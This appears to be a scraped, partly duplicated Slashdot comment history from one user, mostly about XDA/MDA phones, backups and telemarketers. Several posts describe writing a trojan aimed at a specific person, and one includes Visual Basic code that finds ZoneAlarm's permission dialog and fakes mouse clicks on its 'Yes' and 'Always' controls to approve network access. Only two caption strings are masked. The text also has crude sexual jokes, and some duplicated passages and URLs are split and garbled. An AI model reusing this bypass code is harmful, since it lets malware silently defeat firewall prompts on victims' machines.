Sorry, I oversimplified my description. I actually found the captions and class names for the relevant buttons using Spy++, and wrote code to find the hWnds at runtime, using the FindWindowEx APIs.
And if you want to get technical, sending the controls WM_CLICK messages didn't work. The ZA authors clearly anticipated the problem and made ZA check the source of the event messages. I had to first get the coordinates of each control I wanted to click, and then simulate the clicks using the old mouse_event API.
My post was there to illustrate a point. If the user can click a button, so can any application.
Here is the code. I've intentionally masked out some vital parts to make it unusable by script kiddies who don't understand it.
'=============== 'Check for ZoneAlarm window zaWnd = FindWindow("#32770", vbNullString) If zaWnd = 0 Then Exit Sub
'Find which program is being checked proglblhWnd = FindWindowEx(zaWnd, 0&, "Static", vbNullString) If proglblhWnd = 0 Then Exit Sub proglblText = String(255, " ") proglblTextLen = GetWindowText(proglblhWnd, proglblText, 255) proglblText = Left(proglblText, proglblTextLen)
'Check if zonealarm is warning about this program If InStr(1, proglblText, "THE PROGRAM NAME") = 0 Then Exit Sub
'Find yes button ZAYesBtnhWnd = FindWindowEx(zaWnd, 0&, vbNullString, "*BLAH*") If ZAYesBtnhWnd = 0 Then Exit Sub
'Find 'Always' checkbox ZAAlwayshWnd = FindWindowEx(zaWnd, 0&, vbNullString, "*YOU KNOW THE DRILL*") If ZAAlwayshWnd = 0 Then Exit Sub 'Make sure they are both visible If IsWindowVisible(ZAAlwayshWnd) = False Then Exit Sub If IsWindowVisible(ZAYesBtnhWnd) = False Then Exit Sub
wtf? What keeps getting worse? Am I really missing something or are you complaining that a voluntary system for exchanging notes is an exchange of privacy?
Oh, so that explains why that "Olsen Twins Getting it on - 12 Mar 2003.avi" file I downloaded last week contained a zipped tar archive full of boring spreadsheets and a lot of donkey porn.
No figures, but I think the opposite. I've had several DVD-R disks which I've written backups to only to discover that they are unreadable a year later. My personal experience has been that HD's are unreliable, but less unreliable than writable DVDs.
Of course higher quality media might be better, but then you can no longer quote the $0.10/GB figure.
"Out of curiousity, what stops the malware/spyware from clicking the "Yes, let this program access the Internet." button when it pops up?"
Nothing whatsoever. It's a security problem inherent to ANY software firewall.
I wrote a little trojan a while back, and I knew that the guy I wanted to send it to was using zonealarm. I just grabbed that version of ZA, used Spy++ to find the right hWnds for the "Accept" and "Always repeat this choice" buttons, sent it a WM_CLICK event, and ZA was worthless.
The value, in milliseconds, is the amount of time after any user input which programs will not be allowed to steal focus for.
In fact with Windows 2000 and later it's set to 20000, which means that programs cannot steal the focus while you are using the computer.
XP SP2 is still annoying. The reboot reminders don't actually pop up in front, so hitting enter at the wrong time won't cause you to accidentally reboot. However since they keep popping up in the background, sooner or later you will see the message and click the default button before even realising that it's "reboot" and not "bugger off".
I agree with this but only partially. I too have a seperate bluetooth GPS, but would rather have a phone built in but seperate. The main reason is that the built in GSM phone allows me to be connected to the GPRS network even when the XDA is off (in stand-by). That way I can be logged into any IM network/IRC/whatever, and instantly be alerted when I get a message. Also links in nicely with custom home automation software I mentioned in another post. A seperate phone means, as you mentioned, a seperate set of batteries, which is a big issue. It also means the PDA part can't have a non-stop connection without maintaining a bluetooth connection which is another thing which tends to be unreliable and drains batteries.
The MDAIII will be based on the same hardware as the "China Unicom CU928", which doesn't have 3G support. So 3G support will be unlikely.
As rumours of the MDAIII only leaked 2 weeks ago, and the product was confirmed officially yesterday, the article you read may well have been journalist speculation before any real details were known.
(Which is a big shame. I'd love to switch to 3G, but I couldn't part with my XDA).
Depends what you mean "access your phone". You can connect to it, copy files, synchronise contacts/emails/etc.
Another potential use would be streaming MP3's from your home computer so you can walk around the house listening to them on your XDA.
Basically anything you write software. I've written a util for my XDAII which connects to my home server over GPRS, and links in with my home automation. So regardless of where I am, I am instantly alerted when someone approaches the house, presses the doorbell, etc. One click and I can stream the video from a small driveway camera, and another click and I can open the door/turn lights on/whatever.
The Mobile Digital Assistantpage lists two products. One is the MDAI, and the second is the MDAII. The pretty pictures link actually only shows the OLD MDAI model, which still had an external antenna. It is NOT the upcoming MDAIII. I've had the XDAII (same thing as the MDAII, but it's called XDA in the UK for three months now. It's a great product (I love being able to use MSN messenger/IRC from practically anywhere, over a GPRS link, and paying next to nothing [since I'm billed for data transfered and IM/IRC isn't bandwidth intensive]). My only gripe is that its size/weight is a bit larger than standard pocket PCs (then again hardly susprising considering the extra features). WI-FI is the only thing that is missing IMHO, so I am looking forward to the next one.
I read some more info and an original press release. It was posted on www.xda-developers.com (great resourse for MDA/XDA owners). Here are some additional links regarding the upcoming MDAIII:
http://www.t-mobile.net/CDA/tmd_mda_iii,20,,news id -3146,en.html?w=1075&h=847 http://www.mtekk.com.a u/browse/page910.html
It's getting to the point where when authorities find something illegal (like say child porn) on a computer and the owner claims that he didn't put it there, there's really no way to prove beyond a reasonable doubt that he isn't telling the truth.
There's your answer. I imagine framing someone using your method would be difficult. In this case (rtfa) the fact that he wrote the check out to his name didn't seem to matter much (despite everones knee-jerk reaction "omfg, he's so dumb" - he was a suspect anyway). The FBI followed him around for months until they eventually caught him red handed.
Yes, the original article mentioned that the FBI followed the guy around for a few months, and eventually caught him red-handed.
The slashdot story seems to imply that the guy was so dumb that he told them who he was by asking for the check to be written out to himself.
My point is that while asking the check be written out to himself might give them a strong suspicion, it isn't THAT stupid (everyones knee-jerk reaction is "OMFG!1! When he did that everyone knew it was him so he got busted", which is bullshit. There is a difference between knowing who is the culprit, and proving it. The part where the guy fucked up was that he wasn't careful enough when it came to ensuring someone who had the power to raid his house wouldn't find any evidence.
Sorry if my post was a little too unpleasant. I just needed to vent, and you are perhaps not the person who deserved a direct attack.
My point is that many people would consider "ethical telemarketer" to be a bit of an oxymoron. People shouldn't have to invest time into submitting their number to a list, in order to be able to enjoy an undisturbed dinner without solicitations for credit cards/double glazing/etc. I for one have never bought, and will never buy any product from a company which chooses to bombard me with intrusive advertising of any kind.
Having *pride* in the 'quality' of your unsolicited telephone call service? Get over yourself - I think the vast majority of people will agree that you should feel *shame* for what you did, rather than pride for doing it in a slightly less annoying manner. Telemarketers are in the same category of living scum as spammers.
Slashdot Mirror
Sorry, I oversimplified my description. I actually found the captions and class names for the relevant buttons using Spy++, and wrote code to find the hWnds at runtime, using the FindWindowEx APIs.
And if you want to get technical, sending the controls WM_CLICK messages didn't work. The ZA authors clearly anticipated the problem and made ZA check the source of the event messages. I had to first get the coordinates of each control I wanted to click, and then simulate the clicks using the old mouse_event API.
My post was there to illustrate a point. If the user can click a button, so can any application.
Here is the code. I've intentionally masked out some vital parts to make it unusable by script kiddies who don't understand it.
'===============
'Check for ZoneAlarm window
zaWnd = FindWindow("#32770", vbNullString)
If zaWnd = 0 Then Exit Sub
'Find which program is being checked
proglblhWnd = FindWindowEx(zaWnd, 0&, "Static", vbNullString)
If proglblhWnd = 0 Then Exit Sub
proglblText = String(255, " ")
proglblTextLen = GetWindowText(proglblhWnd, proglblText, 255)
proglblText = Left(proglblText, proglblTextLen)
'Check if zonealarm is warning about this program
If InStr(1, proglblText, "THE PROGRAM NAME") = 0 Then Exit Sub
'Find yes button
ZAYesBtnhWnd = FindWindowEx(zaWnd, 0&, vbNullString, "*BLAH*")
If ZAYesBtnhWnd = 0 Then Exit Sub
'Find 'Always' checkbox
ZAAlwayshWnd = FindWindowEx(zaWnd, 0&, vbNullString, "*YOU KNOW THE DRILL*")
If ZAAlwayshWnd = 0 Then Exit Sub
'Make sure they are both visible
If IsWindowVisible(ZAAlwayshWnd) = False Then Exit Sub
If IsWindowVisible(ZAYesBtnhWnd) = False Then Exit Sub
'Dismiss the window
f:
Call SetForegroundWindow(GetDesktopWindow())
If IsWindowVisible(zaWnd) = False Then Exit Sub
'Try dismissing via mouse clicks
GetCursorPos origxy
GetWindowRect ZAAlwayshWnd, wRect
SetCursorPos wRect.Left + 10, wRect.Top + 10
mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
GetWindowRect ZAYesBtnhWnd, wRect
SetCursorPos wRect.Left + 10, wRect.Top + 10
mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
SetCursorPos origxy.x, origxy.y
'============
Yes, it's VB, and the code is rushed and nasty. Get over it.
lmfao. Perhaps you are not familiar with this concept.
wtf? What keeps getting worse? Am I really missing something or are you complaining that a voluntary system for exchanging notes is an exchange of privacy?
Oh, so that explains why that "Olsen Twins Getting it on - 12 Mar 2003.avi" file I downloaded last week contained a zipped tar archive full of boring spreadsheets and a lot of donkey porn.
No figures, but I think the opposite. I've had several DVD-R disks which I've written backups to only to discover that they are unreadable a year later. My personal experience has been that HD's are unreliable, but less unreliable than writable DVDs.
Of course higher quality media might be better, but then you can no longer quote the $0.10/GB figure.
"Out of curiousity, what stops the malware/spyware from clicking the "Yes, let this program access the Internet." button when it pops up?"
Nothing whatsoever. It's a security problem inherent to ANY software firewall.
I wrote a little trojan a while back, and I knew that the guy I wanted to send it to was using zonealarm. I just grabbed that version of ZA, used Spy++ to find the right hWnds for the "Accept" and "Always repeat this choice" buttons, sent it a WM_CLICK event, and ZA was worthless.
Yes, and windows doesn't steal focus anymore. See my post here.
Ummm, if TweakUI can change the setting, it means there MUST be a registry setting for it.
In this case it's:
HKEY_CURRENT_USER\Control Panel\desktop\ForegroundLockTimeout
The value, in milliseconds, is the amount of time after any user input which programs will not be allowed to steal focus for.
In fact with Windows 2000 and later it's set to 20000, which means that programs cannot steal the focus while you are using the computer.
XP SP2 is still annoying. The reboot reminders don't actually pop up in front, so hitting enter at the wrong time won't cause you to accidentally reboot. However since they keep popping up in the background, sooner or later you will see the message and click the default button before even realising that it's "reboot" and not "bugger off".
I agree with this but only partially. I too have a seperate bluetooth GPS, but would rather have a phone built in but seperate. The main reason is that the built in GSM phone allows me to be connected to the GPRS network even when the XDA is off (in stand-by). That way I can be logged into any IM network/IRC/whatever, and instantly be alerted when I get a message. Also links in nicely with custom home automation software I mentioned in another post. A seperate phone means, as you mentioned, a seperate set of batteries, which is a big issue. It also means the PDA part can't have a non-stop connection without maintaining a bluetooth connection which is another thing which tends to be unreliable and drains batteries.
Sure... I'll make a few photographs/screenshots of the Windows CE software.
Currently I don't have much info availible online, except the first prototype of a remote access site I've started to make here
The MDAIII will be based on the same hardware as the "China Unicom CU928", which doesn't have 3G support. So 3G support will be unlikely.
As rumours of the MDAIII only leaked 2 weeks ago, and the product was confirmed officially yesterday, the article you read may well have been journalist speculation before any real details were known.
(Which is a big shame. I'd love to switch to 3G, but I couldn't part with my XDA).
Umm, except that phone doesn't support 3G afaik.
Depends what you mean "access your phone". You can connect to it, copy files, synchronise contacts/emails/etc.
Another potential use would be streaming MP3's from your home computer so you can walk around the house listening to them on your XDA.
Basically anything you write software. I've written a util for my XDAII which connects to my home server over GPRS, and links in with my home automation. So regardless of where I am, I am instantly alerted when someone approaches the house, presses the doorbell, etc. One click and I can stream the video from a small driveway camera, and another click and I can open the door/turn lights on/whatever.
The Mobile Digital Assistantpage lists two products. One is the MDAI, and the second is the MDAII. The pretty pictures link actually only shows the OLD MDAI model, which still had an external antenna. It is NOT the upcoming MDAIII. I've had the XDAII (same thing as the MDAII, but it's called XDA in the UK for three months now. It's a great product (I love being able to use MSN messenger/IRC from practically anywhere, over a GPRS link, and paying next to nothing [since I'm billed for data transfered and IM/IRC isn't bandwidth intensive]). My only gripe is that its size/weight is a bit larger than standard pocket PCs (then again hardly susprising considering the extra features). WI-FI is the only thing that is missing IMHO, so I am looking forward to the next one.
s id -3146,en.html?w=1075&h=847a u/browse/page910.html
I read some more info and an original press release. It was posted on www.xda-developers.com (great resourse for MDA/XDA owners). Here are some additional links regarding the upcoming MDAIII:
http://www.t-mobile.net/CDA/tmd_mda_iii,20,,new
http://www.mtekk.com.
I believe they also have the porno-themed aroma.
It's listed as "Fish Market A123511"
Does it work more than once?
>>> Sausage
The only crimes they seem to be able to solve are ones that involve people having their pictures taken whilst driving too fast.
I couldn't agree more. I take it you are from the UK too? Or is the situation more widespread... ?
It's getting to the point where when authorities find something illegal (like say child porn) on a computer and the owner claims that he didn't put it there, there's really no way to prove beyond a reasonable doubt that he isn't telling the truth.
There's your answer. I imagine framing someone using your method would be difficult. In this case (rtfa) the fact that he wrote the check out to his name didn't seem to matter much (despite everones knee-jerk reaction "omfg, he's so dumb" - he was a suspect anyway). The FBI followed him around for months until they eventually caught him red handed.
Yes, the original article mentioned that the FBI followed the guy around for a few months, and eventually caught him red-handed.
The slashdot story seems to imply that the guy was so dumb that he told them who he was by asking for the check to be written out to himself.
My point is that while asking the check be written out to himself might give them a strong suspicion, it isn't THAT stupid (everyones knee-jerk reaction is "OMFG!1! When he did that everyone knew it was him so he got busted", which is bullshit. There is a difference between knowing who is the culprit, and proving it. The part where the guy fucked up was that he wasn't careful enough when it came to ensuring someone who had the power to raid his house wouldn't find any evidence.
Does requesting that the check is written out to his name immediatly prove that he is the culprit?
If so it would be worryingly easy to frame someone.
Sorry if my post was a little too unpleasant. I just needed to vent, and you are perhaps not the person who deserved a direct attack.
My point is that many people would consider "ethical telemarketer" to be a bit of an oxymoron. People shouldn't have to invest time into submitting their number to a list, in order to be able to enjoy an undisturbed dinner without solicitations for credit cards/double glazing/etc. I for one have never bought, and will never buy any product from a company which chooses to bombard me with intrusive advertising of any kind.
Having *pride* in the 'quality' of your unsolicited telephone call service? Get over yourself - I think the vast majority of people will agree that you should feel *shame* for what you did, rather than pride for doing it in a slightly less annoying manner. Telemarketers are in the same category of living scum as spammers.
Even worse, what if someone hacks into the police database and creates fake gloves with other people's fingerprints etched in them?
That's why fingerprint databases don't store the full image of a fingerprint, only hashes which can verify a fingerprint, but not reconstruct it.
invite at zone-mr.ath.cx
Thanks in advance!
Slashdotting a site which encourages users to repeatedly hit refresh?
;)
A new low, or were they just asking for it?